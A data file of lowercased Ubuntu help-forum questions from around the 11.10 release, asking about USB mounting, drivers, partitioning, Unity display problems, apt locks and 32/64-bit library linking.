95606	how can i mount my leapfrog tag usb device ?	i have no problem with my usb key devices : there are mounted automatically . but for the leapfrog tag usb device it is not mounted automatically . so i look in the ubuntu documentation to mount usb manually . but fdisk returns only info about my hard disk , nothing about leapfrog usb . $ sudo fdisk -l périphérique amorce début fin blocs id système < br > /dev/sda1 * 2048 606713855 303355904 83 linux < br > /dev/sda2 606715902 625141759 9212929 5 étendue < br > /dev/sda5 606715904 625141759 9212928 82 partition d'échange linux / solaris i found some commands able to list this usb device : - lsusb - udevadm ( need unplug the device before using the command and then plug it to see it ) $ lsusb ... bus 005 device 002 : id 0f63:0700 **leapfrog** enterprises pogo < br > and $ udevadm monitor -- udev monitor will print the received events for : udev - the event which udev sends out after rule processing udev [ 1915.787445 ] add /devices/pci0000:00/0000:00:1d.3/usb5/5-2 ( usb ) udev [ 1915.796226 ] add /devices/pci0000:00/0000:00:1d.3/usb5/5-2/5-2:1.0 ( usb ) so i hope to be able to mount it with something like : sudo mount -t ? ? ? /dev/sdb ? ? ? /media/leapfrog how can i know which option and what is the path of the device ? is there a way to use usb id from lsusb ?
95608	flash videos shows everything with a blue-tint after installing nvidia driver ( not the one available under additional software	recently installed driver downloaded from nvidia website and facing problem where all the youtube videos or any other site 's flash videos , are being played with a blue-tint . for eg , the faces are blue and the surrounding atmosphere as well . i 'm on ubuntu 11.10 . any help ? i 've already tried editing gstreamer-properties under video from autodetect to custom but it has n't resolved the issue .
95609	external hard drives not mounted in ubuntu oneiric	i am having a strange issue with external hard drives/usb sticks/cd/sd card etc . in oneiric 11.10 . when i connect any storage device it seems that the device is recognised by the system ( i get `` attached scsi removable disk '' in the syslog ) but the device is not auto-mounted . nor does it even show up in nautilus so that i can click to mount it . i also noted that gparted shows my internal hd ( /dev/sda ) as unallocated although it has 5 partitions on it . sudo fdisk -lu shows all partitions as expected [ although it says `` omitting empty partition ( 5 ) for some reason '' ] omitting empty partition ( 5 ) disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xb8000000 device boot start end blocks id system /dev/sda1 187 426219519 213109666+ 5 extended /dev/sda2 410023936 426217471 8096768 82 linux swap / solaris /dev/sda3 * 426220515 488375999 31077742+ 7 hpfs/ntfs/exfat /dev/sda5 189 348337394 174168603 83 linux /dev/sda6 * 348337458 410021887 30842215 83 linux any ideas on how to troubleshoot further ? might there be an issue with an abstraction layer used by gparted and auto-mounting both ?
95614	`` no kernel error '' when doing a efi install	i created a multi boot usb for my ubuntu & windows 7 install using the steps in another question ( code below ) difference is i used gparted instead of command line to do partitioning . and i used ubuntu alternate iso instead . i could get to the install screens but at install base system , i get no available kernel in repositories error . i did n't find anyway to select & install a kernel . what might be wrong ? and how can i solve this ? fdisk /dev/sdc create new mbr , 'o ' command create new partition , part 1 , size 8g , type ef , set bootable , write mkfs.vfat -f32 /dev/sdc1 mkdir /mnt/usb mount /dev/sdc1 /mnt/usb insert windows 7 x64 dvd , again , mine appeared as /media/udf\ volume , you need to change references below # extract/copy the entire windows dvd to the usb cp -r /media/udf\ volume/* /mnt/usb # i do n't know what effect the following rename has , i copied blindly from another webpage . mv /mnt/usb/sources/ei.cfg /mnt/usb/sources/ei.cfg_ cd /mnt/usb/efi/microsoft/boot/ 7z e /mnt/usb/sources/install.wim 1/windows/boot/efi/bootmgfw.efi cp -r /mnt/usb/efi/microsoft/boot /mnt/usb/efi/ mv /mnt/usb/efi/boot/bootmgfw.efi /mnt/usb/efi/boot/bootx64.efi # at this point i booted the usb , and installed windows 7 to a gpt ssd # upon reboot i noticed the windows boot loader in my uefi boot list ( actually it made itself 1st ) . # so , here we have a standalone windows7 uefi installer that will function correctly ( 64bit asus , at least ) . # now , on to adding ubuntu cd /mnt/usb 7z x /path2iso/ubuntu-11.10-desktop-amd64.iso # if 7z finds prexisting files with the same name , just allow always overwrite # ( y ) es / ( n ) o / ( a ) lways / ( s ) kip all / a ( u ) to rename all / ( q ) uit ? a # at this point i booted the usb , and installed ubuntu x64 to a gpt ssd # we have a standalone ubuntu 64bit installer that install ubuntu 64 # now , on to add a boot manager that will allow us to select between windows 7 and ubuntu # get the target uuid of the usb partition , using either blkid or the following command grub-probe -- target=fs_uuid /mnt/usb/efi/microsoft/boot/bootmgfw.efi will print your_uuid # substitute into the following references to your_uuid # append the following menuentry to /mnt/usb/boot/grub/x86_64-efi/grub.cfg menuentry `` microsoft windows x86_64 uefi-gpt setup '' { insmod usbms insmod part_gpt insmod part_msdos insmod fat insmod search_fs_uuid insmod chain search -- fs-uuid -- no-floppy -- set=root your_uuid # < - change this to your uuid chainloader ( $ { root } ) /efi/microsoft/boot/bootmgfw.efi }
95616	portable virtual machine	i 'd like to create a virtual machine with virtualbox and use it on different computers . the problem is that i need to work on my programming projects on different machines and syncing them over the internet is getting increasingly uncomfortable . can i create a portable virtualmachine and use it across several hosts ? what is the host cpu architectures are different ( 32bit vs 64bit ) ?
95622	on-the-fly file search in gnome 3 ?	i recently switched to gnome 3 ( on onereic 11.10 ) . i was a big fan of gnome-do ( on gnome 2 ) , where i heavily used the `` files and folders '' -plugin . this allows to configure a list of files and folder to be searched on-the-fly while typing . e.g . starting to type `` timesheet '' opens `` timesheet_2011.ods '' from my dropbox account ... i ca n't find anything like this in gnome 3 . i know that there is a list of `` recent items '' , and also the name of bookmarked folders in nautilus is searched , but that 's not ( exactly ) what i 'm looking for ... so , what i want is this : tell gnome 3 where my files are ( certainly not only in my home folder ) have them searched on the fly while i 'm typing i think unity offers something like this - but hey , i 'm using gnome 3 ; - ) anything i missed ?
95624	incompatible libraries when trying to compile a program i wrote	i 'm not a native speaker , but i will try my best in english . for a self-made program i need some libraries ( which are from someone else ) . on my first linux pc it worked , but now on this pc it does n't work . i install the programs with sudo make , and the libraries are copied to /usr/local/lib/ . now i try to compile my program with g++ -g -o cv countvertices.c -lquantim4 -lm -ltiff -lpsgraf3 and it says : /usr/bin/ld : skipping incompatible /usr/local/lib/libquantim4.a when searching for -lquantim4 /usr/bin/ld : can not find -lquantim4 /usr/bin/ld : skipping incompatible /usr/local/lib/libpsgraf3.a when searching for -lpsgraf3 /usr/bin/ld : can not find -lpsgraf3 collect2 : ld gab 1 als ende-status zurück i searched a bit about this error message , and it looks like it has something to do with 32/64-bit versions . the processor is amd athlon ( tm ) ii x2 215 processor × 2 . i installed ubuntu 11.10. desktop version ( i386 ) with windows installer wubi . so now i have a 32 bit version of ubuntu . does someone have an idea how to solve this problem ? or is there a way to see whether the libraries are 32 bit or 64 bit ? thank you for your answer , steabert . the library architecture is x86_64 . but i thought if i run the makefile , the appropriate architecture would be created . the makefile for quantim4 looks like this : # make # # # quantim library ( version 2.0 ) # name = libquantim4 # vpath = /usr/include # cc = g++ # # source files # cfiles = savepaletteimage.c saveshiftimage.c setframe.c stretchhisto.c baddition.c bcontour.c berode.c blogand.c blogor.c bobjects.c gbibin.c gbin.c gbilevel.c gbintwolevel.c gerode.c b2deuler.c pdisector.c btderode.c btderodefilter.c btdopen.c btdcontinuity.c setbtdshell.c dline.c bcontourcent.c rgbtogray.c stretchrgbhisto.c stretchrgbbright.c ran3.c getranddddimage.c createdddimage.c gdiff.c error.c dddminmax.c dddbin.c dddclas.c btdeuler.c dddhisto.c dddcirchisto.c dddeulerfunc.c psplot.c psdddcirchisto.c qdefault.c getcordddimage.c grf3.c getdddgreycdf.c psmultiplot.c glaplace.c gsobel.c ghisto.c pshisto.c bthinning.c bconcom.c bhitmiss.c dddresred.c getdddacov.c gredres.c btdvolsurf.c btdskelet.c btddiffusionz.c btdeuler26.c btdeuler6.c btdmeancurv.c btdquant.c btdsurfdens.c btdvoldens.c getacov.c getcorimage.c getgreycdf.c minmaxf.c gconfunc.c bconcom2.c gcircmask.c bremobjects.c getcordddimage2.c btd2ddd.c grf2ext.c getsemivar.c psmultiplottit.c psplottit.c utils.c getvoronoites.c getpercolclus.c bquant.c beuler4.c beuler8.c blengthdens.c bsurfdens.c bvoldens.c baveragecurvature.c dddbibin.c ghistomatch.c rgb-utils.c btdquantmask.c bquantmask.c bquantrecmask.c berodemark.c bgetdistmap.c btddrawsphere.c btderodemir.c btdgetdistmap.c btdgetdistopenmap.c ddd2dx.c ddddrawcylinder.c dddwatershed.c gwatershed.c setdddshell.c berodemir.c berodemircirc.c bgetdistopenmap.c bthinning8.c btdgetdistopenmapdouble.c btderodemirdouble.c ps3dview.c getrandimage.c files.c pixelrw.c transforms.c filters.c mathmorph.c bgetfulldistmap.c evaluations.c binarization.c erode_open.c greyscale.c minkowski.c binimages.c circmask.c bconlength.c\ $ { null } # # compiler flags # cflags = -o3 -w -r -l/usr/lib -l ~/local/lib -i ~/local/include # # rules # srcfiles = $ ( cfiles ) objfiles = $ ( cfiles : % .c=../bin/ % .o ) $ ( name ) : compile createlibrary ; compile : $ ( objfiles ) # touch emptyfile # $ ( cc ) -o $ @ $ ( cflags ) $ ( objfiles ) -ltiff -lm $ ( objfiles ) : ../bin/ % .o : % .c $ ( cc ) -c $ ( cflags ) $ < -o $ @ createlibrary : ar r libquantim4.a $ ( objfiles ) ranlib libquantim4.a cp libquantim4.a /usr/local/lib/libquantim4.a cp quantim4.h /usr/local/include/ clean : rm -f ../bin/*.o if i run this with `` sudo make '' , why do i get a x86_64 library when i actually have i386 ? the log when i try to compile as normal user : make | tee build.log ar : creating libquantim4.a ar r libquantim4.a ../bin/savepaletteimage.o ../bin/saveshiftimage.o ../bin/setframe.o ../bin/stretchhisto.o ../bin/baddition.o ../bin/bcontour.o ../bin/berode.o ../bin/blogand.o ../bin/blogor.o ../bin/bobjects.o ../bin/gbibin.o ../bin/gbin.o ../bin/gbilevel.o ../bin/gbintwolevel.o ../bin/gerode.o ../bin/b2deuler.o ../bin/pdisector.o ../bin/btderode.o ../bin/btderodefilter.o ../bin/btdopen.o ../bin/btdcontinuity.o ../bin/setbtdshell.o ../bin/dline.o ../bin/bcontourcent.o ../bin/rgbtogray.o ../bin/stretchrgbhisto.o ../bin/stretchrgbbright.o ../bin/ran3.o ../bin/getranddddimage.o ../bin/createdddimage.o ../bin/gdiff.o ../bin/error.o ../bin/dddminmax.o ../bin/dddbin.o ../bin/dddclas.o ../bin/btdeuler.o ../bin/dddhisto.o ../bin/dddcirchisto.o ../bin/dddeulerfunc.o ../bin/psplot.o ../bin/psdddcirchisto.o ../bin/qdefault.o ../bin/getcordddimage.o ../bin/grf3.o ../bin/getdddgreycdf.o ../bin/psmultiplot.o ../bin/glaplace.o ../bin/gsobel.o ../bin/ghisto.o ../bin/pshisto.o ../bin/bthinning.o ../bin/bconcom.o ../bin/bhitmiss.o ../bin/dddresred.o ../bin/getdddacov.o ../bin/gredres.o ../bin/btdvolsurf.o ../bin/btdskelet.o ../bin/btddiffusionz.o ../bin/btdeuler26.o ../bin/btdeuler6.o ../bin/btdmeancurv.o ../bin/btdquant.o ../bin/btdsurfdens.o ../bin/btdvoldens.o ../bin/getacov.o ../bin/getcorimage.o ../bin/getgreycdf.o ../bin/minmaxf.o ../bin/gconfunc.o ../bin/bconcom2.o ../bin/gcircmask.o ../bin/bremobjects.o ../bin/getcordddimage2.o ../bin/btd2ddd.o ../bin/grf2ext.o ../bin/getsemivar.o ../bin/psmultiplottit.o ../bin/psplottit.o ../bin/utils.o ../bin/getvoronoites.o ../bin/getpercolclus.o ../bin/bquant.o ../bin/beuler4.o ../bin/beuler8.o ../bin/blengthdens.o ../bin/bsurfdens.o ../bin/bvoldens.o ../bin/baveragecurvature.o ../bin/dddbibin.o ../bin/ghistomatch.o ../bin/rgb-utils.o ../bin/btdquantmask.o ../bin/bquantmask.o ../bin/bquantrecmask.o ../bin/berodemark.o ../bin/bgetdistmap.o ../bin/btddrawsphere.o ../bin/btderodemir.o ../bin/btdgetdistmap.o ../bin/btdgetdistopenmap.o ../bin/ddd2dx.o ../bin/ddddrawcylinder.o ../bin/dddwatershed.o ../bin/gwatershed.o ../bin/setdddshell.o ../bin/berodemir.o ../bin/berodemircirc.o ../bin/bgetdistopenmap.o ../bin/bthinning8.o ../bin/btdgetdistopenmapdouble.o ../bin/btderodemirdouble.o ../bin/ps3dview.o ../bin/getrandimage.o ../bin/files.o ../bin/pixelrw.o ../bin/transforms.o ../bin/filters.o ../bin/mathmorph.o ../bin/bgetfulldistmap.o ../bin/evaluations.o ../bin/binarization.o ../bin/erode_open.o ../bin/greyscale.o ../bin/minkowski.o ../bin/binimages.o ../bin/circmask.o ../bin/bconlength.o ranlib libquantim4.a cp libquantim4.a /usr/local/lib/libquantim4.a cp : reguläre datei „/usr/local/lib/libquantim4.a“ kann nicht angelegt werden : keine berechtigung make : *** [ createlibrary ] fehler 1 the contents of build.log : ar r libquantim4.a ../bin/savepaletteimage.o ../bin/saveshiftimage.o ../bin/setframe.o ../bin/stretchhisto.o ../bin/baddition.o ../bin/bcontour.o ../bin/berode.o ../bin/blogand.o ../bin/blogor.o ../bin/bobjects.o ../bin/gbibin.o ../bin/gbin.o ../bin/gbilevel.o ../bin/gbintwolevel.o ../bin/gerode.o ../bin/b2deuler.o ../bin/pdisector.o ../bin/btderode.o ../bin/btderodefilter.o ../bin/btdopen.o ../bin/btdcontinuity.o ../bin/setbtdshell.o ../bin/dline.o ../bin/bcontourcent.o ../bin/rgbtogray.o ../bin/stretchrgbhisto.o ../bin/stretchrgbbright.o ../bin/ran3.o ../bin/getranddddimage.o ../bin/createdddimage.o ../bin/gdiff.o ../bin/error.o ../bin/dddminmax.o ../bin/dddbin.o ../bin/dddclas.o ../bin/btdeuler.o ../bin/dddhisto.o ../bin/dddcirchisto.o ../bin/dddeulerfunc.o ../bin/psplot.o ../bin/psdddcirchisto.o ../bin/qdefault.o ../bin/getcordddimage.o ../bin/grf3.o ../bin/getdddgreycdf.o ../bin/psmultiplot.o ../bin/glaplace.o ../bin/gsobel.o ../bin/ghisto.o ../bin/pshisto.o ../bin/bthinning.o ../bin/bconcom.o ../bin/bhitmiss.o ../bin/dddresred.o ../bin/getdddacov.o ../bin/gredres.o ../bin/btdvolsurf.o ../bin/btdskelet.o ../bin/btddiffusionz.o ../bin/btdeuler26.o ../bin/btdeuler6.o ../bin/btdmeancurv.o ../bin/btdquant.o ../bin/btdsurfdens.o ../bin/btdvoldens.o ../bin/getacov.o ../bin/getcorimage.o ../bin/getgreycdf.o ../bin/minmaxf.o ../bin/gconfunc.o ../bin/bconcom2.o ../bin/gcircmask.o ../bin/bremobjects.o ../bin/getcordddimage2.o ../bin/btd2ddd.o ../bin/grf2ext.o ../bin/getsemivar.o ../bin/psmultiplottit.o ../bin/psplottit.o ../bin/utils.o ../bin/getvoronoites.o ../bin/getpercolclus.o ../bin/bquant.o ../bin/beuler4.o ../bin/beuler8.o ../bin/blengthdens.o ../bin/bsurfdens.o ../bin/bvoldens.o ../bin/baveragecurvature.o ../bin/dddbibin.o ../bin/ghistomatch.o ../bin/rgb-utils.o ../bin/btdquantmask.o ../bin/bquantmask.o ../bin/bquantrecmask.o ../bin/berodemark.o ../bin/bgetdistmap.o ../bin/btddrawsphere.o ../bin/btderodemir.o ../bin/btdgetdistmap.o ../bin/btdgetdistopenmap.o ../bin/ddd2dx.o ../bin/ddddrawcylinder.o ../bin/dddwatershed.o ../bin/gwatershed.o ../bin/setdddshell.o ../bin/berodemir.o ../bin/berodemircirc.o ../bin/bgetdistopenmap.o ../bin/bthinning8.o ../bin/btdgetdistopenmapdouble.o ../bin/btderodemirdouble.o ../bin/ps3dview.o ../bin/getrandimage.o ../bin/files.o ../bin/pixelrw.o ../bin/transforms.o ../bin/filters.o ../bin/mathmorph.o ../bin/bgetfulldistmap.o ../bin/evaluations.o ../bin/binarization.o ../bin/erode_open.o ../bin/greyscale.o ../bin/minkowski.o ../bin/binimages.o ../bin/circmask.o ../bin/bconlength.o ranlib libquantim4.a cp libquantim4.a /usr/local/lib/libquantim4.a the library architecture : objdump -a /usr/local/lib/libquantim4.a in archive /usr/local/lib/libquantim4.a : savepaletteimage.o : file format elf64-x86-64 rw -- -- -- - 1000/1000 4248 jan 16 21:33 2011 savepaletteimage.o saveshiftimage.o : file format elf64-x86-64 rw -- -- -- - 1000/1000 2280 jan 16 21:33 2011 saveshiftimage.o ... but wait a moment , x86 means 32-bit , right ? and i386 also is 32-bit . so where is the problem ?
95625	suspend to ram and encrypted partitions	normally i do n't shutdown my notebook any more in favour of using suspend-to-ram . the downside is that my encrypted home partition is completely accessible after resume without entering the passphrase . a bad idea if someome steals your notebook ... looking at cryptsetup 's manpage . i 've learned that luks now supports the lukssuspend and luksresume command . has lukssuspend and luksresume been integrated in the scripts doing suspend-to-ram and resume ?
95626	any way to recover data on a re-installed ubuntu os on same partition ?	one day before i had ubuntu 11.10 on my laptop i was trying to install an mp3 application during the process something broke ( as far as i know it removed bin and usr directory for some weird reason ) and from the next reboot it was not going further grub screen , one black screen with no information on it . i had then re-installed ( without formatting the partition ) ubuntu 11.04 on the same and the only partition i have . do you or anyone in your knowledge know , how to get the old data back ? ? any help or reference to help me out of this will be appreciated . thanks
95627	can i synchronise my blackberry 9700 bold with ubuntu one ?	can i synchronise my blackberry 9700 bold with ubuntu one ?
95629	software for maintaining arbitrary file collection across multiple volumes	i would like to use a single piece of software to maintain a collection of files . these files include music , movies , ebooks , win32 installers , photos and artwork . they are stored on my local hdd , remote hdd , cds and dvds . by maintain , i mean i want to be able to browse the entire collection on my desktop without having a live remote connection or mounted volume . thumbnails for each item would be ideal . i do n't mind having to shoehorn another application to suit this purpose . for example , i could imagine maintaining a collection of images using shotwell , where each image represents a particular file ( for example , the cd cover , movie poster , dvd cover , book cover , software cover or screenshot , thumbnail ) . each image would be titled and tagged appropriately ( `` sita sings the blues '' , `` animated , creative-commons , movie , unwatched '' ) . but then i need to easily and accurately store the file location ( `` /media/animated2/sita sings the blues.mkv '' ) . any suggestions on an application or process ? a cross-platform ( ubuntu + win32 ) application that could access the same storage resource would be best .
95630	password problem	ubuntu 11.1 is rejecting my password when i try to do anything that requires authentication . i am also asked for an administrative password when installing a new printer driver . i did not know i had an administrative password separate from the regular password . so , i need help in getting a password that works and discovering what my administrative password is . any help will be greatly appreciated . sam w. keenon center point , al
95632	volume widget issue with sound card hotplugging	when plugging a usb sound card may sometimes cause the current audio output ( ie . banshee and pc speakers ) to switch immediately . but the volume controls ( sound widget in systray , volume keyboard keys ) are stuck on the old sound card . plug a soundcard and amplifier while the volume is set to ultra high for the pc speakers . you ca n't control the volume without opening the sound settings or alsamixer . this could probably cause neighbour disturbance in some countries . you ca n't control it with the sound widget of the systray nor the volume keyboard keys . how to disable auto switch of hardware audio output , or enable auto switch of software volume controls ? it would be great to make the software behaviour consistent with the hardware 's . ubuntu 11.10 vanilla up to date .
95633	error while using apt-get install	i am getting the following error whenever i try to install anything using apt-get install : liam @ liam-tosh-linux : ~ $ sudo apt-get install chromium-browser [ sudo ] password for liam : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? what is causing this error ?
95638	will the unity launcher ever be animated ?	moving my mouse over the unity launcher feels like i 'm moving my mouse over the desktop wallpaper . lifeless . will the developers ever consider animating the launcher so that the mouse experience is a bit enhanced ? i 'm not here to give ideas , but even if the icons increased in size on a mouse-over event , would be a better than nothing . or changed colour . or something . it 's the attention to detail that puts apple in the forefront of aesthetics . i 'd like ubuntu to be at the forefront and , while i 'm thrilled at where it 's headed , something as rudimentary as touch-and-feel should be included in the interface .
95642	cant open skype again after closing it : <	i have skype installed but if i close the `` main menu '' it is still running in the background but i cant open it again . how can i open the window again ? : s
95644	why ca n't i copy files to my nas ?	i can normally access all of my nas shares without issue from my ubuntu laptop . i have bookmarked all of the shares without issue , although they are a little slow to access . however moving files to and from the nas is driving me crazy ! ! ! i can play music files , and movies , but i ca n't select them to copy . most annoying is that it is impossible to copy a folder/ file from my laptop to the nas , every time i get the following error ; the specified location is not mounted i then try again to find that the folder has been copied , but only part of the contents . does anyone have a suggestion what the problem is ?
95649	configuring a wide screen ( 1600x900 ) on a desktop	i just installed an 22 '' wide samsung monitor , and it looks very strange - it the right 20 % of the display are wrapped to the left side of the monitor ! this is my system according to uname -a : linux ubuntu 2.6.32-34-generic # 77-ubuntu smp tue sep 13 19:39:17 utc 2011 x86_64 gnu/linux this is my .config/monitors.xml : < monitors version= '' 1 '' > < configuration > < clone > no < /clone > < output name= '' default '' > < vendor > ? ? ? < /vendor > < product > 0x0000 < /product > < serial > 0x00000000 < /serial > < width > 1600 < /width > < height > 900 < /height > < rate > 0 < /rate > < x > 0 < /x > < y > 0 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > no < /primary > < /output > < /configuration > < /monitors > these are the files in my /etc/x11 : drwxr-xr-x 10 root root 4096 2011-08-18 22:35 . drwxr-xr-x 144 root root 12288 2012-01-15 15:48 .. drwxr-xr-x 2 root root 4096 2011-11-17 09:09 app-defaults drwxr-xr-x 2 root root 4096 2011-07-19 15:21 cursors -rw-r -- r -- 1 root root 14 2011-08-18 22:35 default-display-manager drwxr-xr-x 6 root root 4096 2011-07-19 15:17 fonts -rw-r -- r -- 1 root root 17394 2011-08-18 22:35 rgb.txt lrwxrwxrwx 1 root root 13 2011-08-18 22:35 x - > /usr/bin/xorg drwxr-xr-x 3 root root 4096 2011-07-19 15:21 xinit drwxr-xr-x 2 root root 4096 2010-04-15 15:12 xkb -rw-r -- r -- 1 root root 270 2011-08-18 22:35 xorg.conf.failsafe -rwxr-xr-x 1 root root 709 2011-08-18 22:35 xreset drwxr-xr-x 2 root root 4096 2011-07-19 15:08 xreset.d drwxr-xr-x 2 root root 4096 2011-07-19 15:08 xresources -rwxr-xr-x 1 root root 3730 2011-08-18 22:35 xsession drwxr-xr-x 2 root root 4096 2011-08-23 18:08 xsession.d -rw-r -- r -- 1 root root 265 2011-08-18 22:35 xsession.options -rw -- -- -- - 1 root root 601 2011-08-18 22:35 xwrapper.config this is my xorg.conf.failsafe : section `` device '' identifier `` configured video device '' driver `` fbdev '' endsection section `` monitor '' identifier `` configured monitor '' endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' endsection these are the resolutions available on my system ( according to xrandr ) : screen 0 : minimum 640 x 480 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 0.0* 800x600 0.0 640x480 0.0 here is what i get from read-edid : erelsgl @ ubuntu : ~ $ sudo get-edid | parse-edid parse-edid : parse-edid version 2.0.0 get-edid : get-edid version 2.0.0 performing real mode vbe call interrupt 0x10 ax=0x4f00 bx=0x0 cx=0x0 function supported call successful vbe version 300 vbe string at 0x11100 `` intel ( r ) sandybridge desktop graphics chipset accelerated vga bios '' vbe/ddc service about to be called report ddc capabilities performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x0 cx=0x0 function supported call successful monitor and video card combination does not support ddc1 transfers monitor and video card combination supports ddc2 transfers 0 seconds per 128 byte edid block transfer screen is not blanked during ddc transfer reading next edid block vbe/ddc service about to be called read edid performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x1 cx=0x0 function supported call successful parse-edid : edid checksum passed . # edid version 1 revision 3 section `` monitor '' # block type : 2:0 3 : fd # block type : 2:0 3 : fc identifier `` syncmaster '' vendorname `` sam '' modelname `` syncmaster '' # block type : 2:0 3 : fd horizsync 30-81 vertrefresh 56-75 # max dot clock ( video bandwidth ) 150 mhz # block type : 2:0 3 : fc # block type : 2:0 3 : ff # dpms capabilities : active off : yes suspend : no standby : no mode `` 1600x900 '' # vfreq 60.000hz , hfreq 60.000khz dotclock 108.000000 htimings 1600 1624 1704 1800 vtimings 900 901 904 1000 flags `` +hsync '' `` +vsync '' endmode # block type : 2:0 3 : fd # block type : 2:0 3 : fc # block type : 2:0 3 : ff endsection my display card is : erelsgl @ ubuntu : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation sandy bridge integrated graphics controller ( rev 09 ) thank you in advance !
95652	repartitioning dual booting macbook	i have a macbook pro configured to dual boot osx or ubuntu . originally , i split the drive evenly between the two , but as i 've been using ubuntu far more heavily , and i 'm running out of space on its partition , i want to reconfigure the partitions to give ubuntu a greater share of disk space . i tried using gparted , both running from inside ubuntu and from gparted 's live cd , but in both i get the following screen : as you can see , ubuntu has about 72gb of space . i 've already shrunk the osx partition down , leaving about 45gb of free space . i 'm trying to expand the ubuntu partition to include that additional 45gb of space , but gparted wo n't allow me to , presumably because of that weird `` unknown '' 1mb partition in the middle . i 'm not 100 % sure what it is , but the flags for it list `` bios_grub '' , so i 'm assuming it 's where refit installed grub . unfortunately , gparted wo n't let me relocate this partition , only delete it ( and i 'm sure i 'd hose my system if i did that ) . how can i resize my ubuntu partition to use my free disk space ?
95653	how to install amd k7 kernel in ubuntu	i tried to install amd k7 kernel in ubuntu 11.10 ( 64 bit ) but e : unable to locate package sudo apt-get install linux-k7 sudo apt-get install linux-k7-smp
95655	chromium font colour	my chromium fonts are a bit off . i had a problem with the fonts themselves and the size . i managed to just select different fonts under the `` preferences '' menu in chromium and to change the size as well . however , i am still faced with the issues of colour . fonts that are normally white in other browsers for example , are a dull gray and almost impossible to read on certain backgrounds ( blue for example ) . is there any way to remedy this problem ?
95659	unity launcher still unmovable in 5.0 ?	is it possible to move the launcher from the left to any other place ?
95665	upgrading ubuntu from 11.04 to 11.10	i want to download the 11.10 version of ubuntu , and it says that i 've to burn a cd , or place it in a usb . my question is ; is it necesary to do the cd or usb backup even tough i 'm actually working in ubuntu ? thanks for the answers .
95670	ubuntu 11.10 always end up with a black desktop and visibile mouse cursor after only a few days from a fresh install	before going to reinstall the system again i decided to open a new thread here because i realized that after a few days from a fresh install ubuntu will become again unbootable . the iter is always the same . after a fresh install , the system works fine except some rare case where the boot get stuck on `` checking battery state ... '' . when this happen , a simple `` start lightdm '' is enough and i 'm ready to go . after a few days or one week of usage , the following events/symptoms always occur : 1 - once i end to work and i need to reboot or power off , nothing happen when i click on the gui buttons . i can only restart or power off from terminal . 2 -during reboot the system get stuck on `` checking the battery state '' . the trick `` start lightdm '' works , but instead of loading the desktop , the login screen appear . i enter my password , but nothing happen . all i get it 's just the login wallpaper with the ubuntu 11.10 logo on the bottom left . 3 - i reboot again the system without touching anything , the ubuntu logo with loading bar is showed as usual and once done the screen become black with visible and working mouse cursor . this is what i 've tried so far : ctr+alt+f1 : `` unity -- replace '' and the results are the same described in point 2 , but when i return to terminal i can see the following errors : warning : no display variable set , setting it to :0 unity-panel-service : no process found compiz : ../../xcb_io.c:528 : _xallocid : assertion 'ret ! = inval_id ' failed aborted rebooted , retried again with the same result , but with a different error on terminal : warning : no display variable set , setting it to :0 unity-panel-service : no process found ( compiz:1505 ) : gdk-warning ** : compiz : fatal io error 11 ( resource temporarily unavailable ) on x server : 0 '' service lightdm restart '' : the command restart the service , but again black screen with visible mouse cursor removed quiet splash parameter from boot and added nomodeset : same black screen with visible mouse cursor started in recovery mode : again black screen i 'm very frustrated because i know that if i reinstall ubuntu again , i will only have a system that will stop working after a few days , maybe a few weeks if i 'm lucky ! thanks to all
95672	do not have the unity 3d option at login	i am not receiving the unity 3d option when logging into ubuntu 11.10 . the only options i have are gnome , gnome classic , gnome classic ( no effects ) , ubuntu , and ubuntu 2d . i ran the test /usr/lib/nux/unity_support_test -p . here are the results : opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) sandybridge mobile opengl version string : 2.1 mesa 7.11 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes i even tried the solutions mentioned at no unity 3d option on the login screen , but i am still not able to log into unity 3d . under system info -- > graphics the driver is listed as intel sandybridge mobile and experience as standard .
95675	unity on ubuntu 11.10 - the dash home button brings up the panel , but is empty	the dash home button brings up a panel that is greyed out , but it is totally empty . it seems to be the very same issue as this : dash home button brings up blank window which is unanswered . /usr/lib/nux/unity_support_test -p returns opengl vendor string : x.org r300 project opengl renderer string : gallium 0.4 on ati rv370 opengl version string : 2.1 mesa 7.11 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes i 've tried a unity -- reset but that does n't seem to work . unity seems to reset , but i get the following warning over and over : cs space validation failed unity what should i do next to try and fix this ? edit : attempted fixes : i 've refomatted , did not work . i 've done apt-get remove unity then apt-get update then apt-get install unity , did not work . i 've switched to unity 2d and this seems to work . how can i get regualar unity working or atleast find the error ?
95676	is there any command line or gui tool to measure signal strength of wireless	i want to know if there exists any command line option or gui tool ( ubuntu 11.10 ) so that i can measure the strength of wireless signal at a given location.i have a house where the wireless is not easily accessible at all corners i want to know at which corners or rooms the signal is weak.this will help me a lot . thanks in advance .
95677	kubuntu 11.10 internet sharing via wireless	i just setup fresh kubuntu 11.10 . i have a wired internet in my apartment but need to do wireless internet sharing from kubuntu ( laptop i using ) to another mac book pro . i ca n't find the solution that match what i need . anyone have some good guide or solution : ) for this .
